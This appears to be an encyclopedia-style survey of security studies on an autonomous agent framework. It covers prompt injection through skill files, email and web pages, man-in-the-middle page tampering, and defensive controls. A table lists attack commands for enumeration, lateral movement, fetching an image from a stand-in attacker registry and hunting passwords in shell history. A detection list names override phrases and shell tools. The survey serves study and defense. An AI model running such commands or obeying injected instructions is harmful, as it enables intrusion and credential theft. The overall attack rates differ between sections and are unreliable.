KimiClaw Security Analysis
- KimiClaw Security Analysis is a comprehensive study of an autonomous agent framework that interacts directly with system resources, distinguishing it from chat-only LLM deployments.
- It employs quantitative benchmarks, including CLAWSAFETY and full lifecycle audits, to assess vulnerabilities such as prompt injection, harmful misoperation, and supply-chain risks.
- Defense strategies emphasize least privilege, runtime isolation, extension governance, and exhaustive logging to mitigate systemic risks and enhance overall security posture.
KimiClaw is an OpenClaw-derivative autonomous agent framework designed for high-privilege work automation across domains such as software engineering, finance, healthcare, law, and DevOps. Unlike chat-only LLM deployments, KimiClaw interacts directly with system resources, network interfaces, tools, and extensions, which amplifies both its utility and its attack surface. Security analysis of KimiClaw centers on its exposure to adversarial input, deployment vulnerabilities, agent–model interactions, and the systemic risks introduced by persistent state and tool orchestration. Multiple independent studies and benchmarks (most notably CLAWSAFETY, ClawTrap, and comprehensive threat lifecycle audits) provide a quantitative basis for KimiClaw security evaluation and hardening.
1. Threat Model and Vulnerability Taxonomy
The security posture of KimiClaw is best understood through a formal threat model that considers adversaries with the capability to manipulate inputs, extensions, deployment context, and runtime environment (Li et al., 13 Mar 2026). The risk taxonomy encompasses:
- Prompt Injection: Maliciously crafted input that hijacks policy enforcement or plan creation by exploiting the prompt–context composition.
- Harmful Misoperation: Induced execution of unintended or destructive actions due to ambiguous prompts or context drift.
- Extension Supply-Chain Risk: The risk that third-party skills or plugins are compromised, delivering privilege escalation or persistent logic bombs.
- Deployment Vulnerability: Weak authentication, permissive sandboxes, and absent network controls allowing the adversary to escalate, maintain, or exfiltrate.
These vulnerabilities are mapped to KimiClaw subsystems: parsers, plan managers, tool orchestrators, memory/workspace, extension loader, and API endpoints. A system transition function describes the full system behavior; it is defined over the user, the conversation context, the mixed-trust input set, the prompt sequence, the tool/plugin set, the extension set, and the action set (Li et al., 13 Mar 2026).
2. Benchmark-Driven Security Evaluation
Systematic measurement of KimiClaw’s vulnerabilities leverages scenario-based, adversarial benchmarking as in CLAWSAFETY and full lifecycle audits (Wei et al., 1 Apr 2026, Wang et al., 3 Apr 2026). Attack scenarios are constructed along three orthogonal axes:
- Harm Domain: Compromise goals include credential theft, financial misrouting, regulatory data breach, legal information leakage, and destructive infrastructure actions.
- Attack Vector: Entry points are skill injections (malicious skill files within ~/.kimiclaw/skills/), email (injected via IMAP/SMTP hooks in the sandbox), and web (malicious pages fetched during agent operations).
- Harmful Action Type: These include data exfiltration, credential forwarding, unlawful file modification, destructive OS actions, and destination/origin substitution.
Each test instance is embedded in a 64-turn, multi-phase workflow with ≥50 heterogeneous files and associated colleague identities, mimicking production-grade usage. For quantitative analysis, two metrics are used: the per-vector attack success rate (ASR), which is the fraction of attack instances delivered through a given vector that succeed, and the aggregate ASR across all vectors.
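The ASR formulas themselves are not reproduced in this text. A conventional formulation is sketched below as an assumption: the symbols $A_v$ (the set of attack instances delivered through vector $v$) and $\mathrm{succ}(a)$ (an indicator that instance $a$ achieved its harmful goal) are introduced here for illustration and are not taken from the benchmark papers. The aggregate is written as a pooled rate, which coincides with the mean of the per-vector rates when every vector has the same number of instances.

$$
\mathrm{ASR}_v = \frac{\sum_{a \in A_v} \mathrm{succ}(a)}{|A_v|},
\qquad
\mathrm{ASR} = \frac{\sum_{v} \sum_{a \in A_v} \mathrm{succ}(a)}{\sum_{v} |A_v|},
\qquad v \in \{\text{skill}, \text{email}, \text{web}\}.
$$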
KimiClaw, evaluated as Kimi K2.5 on the OpenClaw scaffold, achieves ASRs of 77.5% (skill), 60.0% (email), 45.0% (web), and 60.8% overall. These results establish a trust gradient of skill > email > web, and a robustness ordering in which KimiClaw is less robust than Sonnet 4.6 but more robust than GPT-5.1 (Wei et al., 1 Apr 2026).
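As a worked check of these figures, the following minimal sketch computes per-vector and pooled ASR from a list of attack outcomes. The instance counts (40 per vector) are hypothetical, chosen only because they reproduce the reported percentages; the source does not state the per-vector counts, and the function name is illustrative.

```python
from collections import defaultdict


def attack_success_rates(outcomes):
    """Return (per-vector ASR, pooled ASR) as fractions in [0, 1].

    `outcomes` is an iterable of (vector, succeeded) pairs,
    one pair per attack instance.
    """
    attempts = defaultdict(int)
    successes = defaultdict(int)
    for vector, succeeded in outcomes:
        attempts[vector] += 1
        successes[vector] += int(succeeded)
    per_vector = {v: successes[v] / attempts[v] for v in attempts}
    total = sum(attempts.values())
    aggregate = sum(successes.values()) / total if total else 0.0
    return per_vector, aggregate


# HYPOTHETICAL counts (successes, instances) per vector; not from the source.
HYPOTHETICAL_COUNTS = {"skill": (31, 40), "email": (24, 40), "web": (18, 40)}

outcomes = [
    (vector, i < wins)
    for vector, (wins, n) in HYPOTHETICAL_COUNTS.items()
    for i in range(n)
]
per_vector, aggregate = attack_success_rates(outcomes)
print({v: round(100 * r, 1) for v, r in per_vector.items()})
print(round(100 * aggregate, 1))
```

With equal instance counts per vector, the pooled rate equals the mean of the three per-vector rates, which is consistent with the reported 60.8% overall figure.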
3. Empirical Vulnerabilities and Exploit Patterns
Multi-stage, category-based audits provide fine-grained insights into KimiClaw’s empirical weaknesses (Wang et al., 3 Apr 2026). Of the 205 tested cases across 13 threat categories, attack success rates for the following critical classes range from 14.29% to 100%:
| Category | Success Rate (%) | Example Attack |
|---|---|---|
| Reconnaissance | 100.0 | ifconfig && netstat -antp for network enumeration |
| Discovery | 68.97 | nmap -sS 192.168.0.0/24; process/service discovery |
| Lateral Movement | 66.67 | sshpass -p … ssh user@host for host traversal |
| Resource Development | 57.14 | docker pull registry.attacker.io/evil:latest |
| Privilege Escalation | 30.0 | sudo -l; SUID enumeration and privilege drift |
| Credential Access | 14.29 | grep -i password ~/.bash_history and private key exfiltration |
An additional chain-stage breakdown shows that early-stage vulnerabilities are amplified into concrete system-level failures at later phases.
4. MITM Red-Teaming and Dynamic Security Probing
Modern agent security analysis extends beyond static adversarial inputs to include live network-level attacks, as exemplified by the ClawTrap framework (Zhao et al., 19 Mar 2026). KimiClaw-specific security assessment employs MITM-based probes, supporting:
- Static HTML Replacement: The entire page body is swapped for attacker-controlled content, measured by a content replacement metric.
- Iframe Injection: High z-index overlays are appended to legitimate pages (phishing, session hijack), quantified by the overlay area fraction.
- Dynamic Content Modification: Fine-grained tampering of DOM/JSON fragments, assessed with a corresponding metric.
Evaluation proceeds by recording model trust scores and fallback rates, with strong models triggering higher fallback rates (e.g., 70% for GPT-5.4 analogs) compared to less robust models (<5% fallback) under identical MITM stress.
MITM defenses for KimiClaw include enforcing HTTPS with certificate pinning, strict content hash verification, explicit “trust verification” agent skills, UI anomaly detectors, and centralized anomaly logging.
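The content hash verification mentioned above can be illustrated with a minimal sketch. It assumes the expected SHA-256 digest is obtained out of band from a trusted source (for example a signed manifest); the function name `verify_content_hash` is hypothetical and not part of any KimiClaw API.

```python
import hashlib
import hmac


def verify_content_hash(body: bytes, expected_sha256_hex: str) -> bool:
    """Return True only if `body` hashes to the pinned SHA-256 digest.

    ASSUMPTION: `expected_sha256_hex` comes from a trusted channel,
    not from the same response that is being checked.
    """
    actual = hashlib.sha256(body).hexdigest()
    # Constant-time comparison avoids leaking how many characters matched.
    return hmac.compare_digest(actual, expected_sha256_hex.lower())


# Usage: a page tampered with in transit no longer matches the pinned digest.
original = b"<html><body>quarterly report</body></html>"
pinned = hashlib.sha256(original).hexdigest()
tampered = original.replace(b"</body>", b"<iframe src='//evil'></iframe></body>")

print(verify_content_hash(original, pinned))
print(verify_content_hash(tampered, pinned))
```

A check of this kind only helps for resources whose expected content is known in advance; dynamic pages would need the other listed controls, such as certificate pinning and anomaly detection.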
5. Design Principles and Secure Engineering Controls
Four foundational principles, as articulated in the defensible design blueprint, govern robust KimiClaw deployments (Li et al., 13 Mar 2026):
- Least Privilege: Each task is granted only the capabilities it requires, enforced via tool-access policies that deny anything not explicitly granted.
- Runtime Isolation: Execution environments are partitioned into sandboxes with disjoint filesystem roots and environment variables; cross-sandbox visibility is formally forbidden.
- Extension Governance: Skills/extensions must provide signed manifests; installation proceeds only after signature and hash verification succeed, and the extension is rejected otherwise.
- Auditability/Defense in Depth: All actions and decisions logged in tamper-evident, append-only ledgers, supporting post-hoc investigation and continuous monitoring.
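The least-privilege principle in the list above can be sketched as a default-deny policy check placed in front of every tool call. This is an illustration under stated assumptions, not KimiClaw's actual policy engine: `ToolPolicy`, `PolicyViolation`, `invoke_tool`, and the task and tool names are all hypothetical.

```python
from dataclasses import dataclass, field


class PolicyViolation(PermissionError):
    """Raised when a task tries to use a tool it was not granted."""


@dataclass
class ToolPolicy:
    # Maps a task name to the set of tools that task may invoke.
    grants: dict = field(default_factory=dict)

    def is_allowed(self, task: str, tool: str) -> bool:
        # Default deny: unknown tasks and ungranted tools are both refused.
        return tool in self.grants.get(task, frozenset())


def invoke_tool(policy: ToolPolicy, task: str, tool: str, run):
    """Run the zero-argument callable `run` only if the policy allows it."""
    if not policy.is_allowed(task, tool):
        raise PolicyViolation(f"task {task!r} may not use tool {tool!r}")
    return run()


# Usage with hypothetical task and tool names.
policy = ToolPolicy({"summarize_report": frozenset({"read_file"})})
print(invoke_tool(policy, "summarize_report", "read_file", lambda: "contents"))
try:
    invoke_tool(policy, "summarize_report", "shell", lambda: "should not run")
except PolicyViolation as exc:
    print("denied:", exc)
```

Keeping the check in a single wrapper means a tool added later is denied until someone grants it explicitly, which is the behavior the principle asks for.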
Design patterns include explicit access-control checks per tool, sandbox-boundary enforcement, manifest verification during extension installation, and per-action audit logs with cryptographic hash chaining.
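One common way to realize per-action audit logs with cryptographic hash chaining is shown below as a minimal in-memory sketch. The class name `AuditLog`, the record fields, and the all-zero genesis value are assumptions made for illustration; a real deployment would also need durable, append-only storage.

```python
import hashlib
import json

GENESIS = "0" * 64  # assumed starting value for the chain


def _entry_hash(prev_hash: str, record: dict) -> str:
    # Canonical JSON so the same record always yields the same digest.
    payload = json.dumps(record, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256((prev_hash + payload).encode("utf-8")).hexdigest()


class AuditLog:
    def __init__(self):
        self._entries = []  # list of (record, digest) pairs

    def append(self, record: dict) -> str:
        """Append a record, chaining its digest to the previous entry."""
        prev = self._entries[-1][1] if self._entries else GENESIS
        digest = _entry_hash(prev, record)
        self._entries.append((dict(record), digest))
        return digest

    def verify(self) -> bool:
        """Recompute the chain; any edited or reordered entry breaks it."""
        prev = GENESIS
        for record, digest in self._entries:
            if _entry_hash(prev, record) != digest:
                return False
            prev = digest
        return True


# Usage with hypothetical action records.
log = AuditLog()
log.append({"action": "read_file", "path": "report.txt", "decision": "allow"})
log.append({"action": "shell", "cmd": "sudo -l", "decision": "deny"})
print(log.verify())
```

Because each digest covers the previous one, altering an early record invalidates every later entry, which is what makes the ledger tamper-evident rather than merely append-only.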
6. Defense Recommendations and Evaluation Metrics
Mitigation strategies span the full lifecycle:
- Input-Side Inspection: Normalize and rescan all inputs for suspicious opcodes, keywords, or encoded commands prior to prompt assembly.
- Safer Planning: Mark any plan involving sudo, …
Evaluation metrics and their target thresholds include:
- Fraction of adversarial inputs failing to alter the plan: at least 99%
- Harmful-misoperation rate: at most 0.5%
- Extension-compromise detection: time-to-detect of at most 60 s
- Unauthorized action prevention: policy-consistent action logging and denial
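The input-side inspection recommended in this section (normalize, then rescan for keywords and encoded commands before prompt assembly) can be sketched as follows. The keyword list, the base64 heuristic, and the function names are illustrative assumptions, not the rule set used by KimiClaw or by the cited studies; a production scanner would need a far broader and regularly updated set of patterns.

```python
import base64
import binascii
import re
import unicodedata

# HYPOTHETICAL keyword list, for illustration only.
SUSPICIOUS = re.compile(
    r"\b(sudo|curl|wget|rm\s+-rf|ignore (all )?previous instructions)\b",
    re.IGNORECASE,
)
# Heuristic: runs of 16+ base64 characters, optionally padded.
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def normalize(text: str) -> str:
    """Fold compatibility forms and drop invisible format characters."""
    text = unicodedata.normalize("NFKC", text)
    return "".join(ch for ch in text if unicodedata.category(ch) != "Cf")


def decoded_views(text: str):
    """Yield the text itself plus any base64 runs that decode to UTF-8."""
    yield text
    for run in BASE64_RUN.findall(text):
        try:
            yield base64.b64decode(run, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue


def findings(text: str) -> list:
    """Return the suspicious keywords found in any view of the input."""
    hits = []
    for view in decoded_views(normalize(text)):
        hits.extend(m.group(0).lower() for m in SUSPICIOUS.finditer(view))
    return hits


# Usage: a zero-width space and a base64 wrapper both fail to hide "sudo".
encoded = base64.b64encode(b"sudo rm -rf /").decode("ascii")
print(findings("su\u200bdo ls"))
print(findings(f"please run {encoded}"))
print(findings("Summarize the quarterly report"))
```

Scanning the decoded views as well as the raw text matters because an attacker can otherwise pass a keyword filter simply by encoding the payload.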
7. Comparative Assessment and Ongoing Risks
KimiClaw’s overall attack success rate (40.8%) positions it as more resilient than QClaw (54.9%) and AutoClaw (49.5%), but significantly less robust than MaxClaw (16.0%) and OpenClaw (19.4%). Its profile is characterized by unique susceptibility to lateral movement and resource development, weaknesses not found in pure OpenClaw deployments. Cross-scaffold and backbone analyses confirm that security outcomes are determined by the confluence of agent runtime, model safety properties, scaffold memory policies, and tool orchestration.
Periodic re-evaluation with updated adversarial scenarios and lifecycle-wide monitoring remains essential to maintain and improve KimiClaw’s security guarantees. Full-stack, policy-mediated permission management, extension governance, runtime isolation, and continuous audit form the core of defensible, testable KimiClaw deployments (Wei et al., 1 Apr 2026, Zhao et al., 19 Mar 2026, Li et al., 13 Mar 2026, Wang et al., 3 Apr 2026).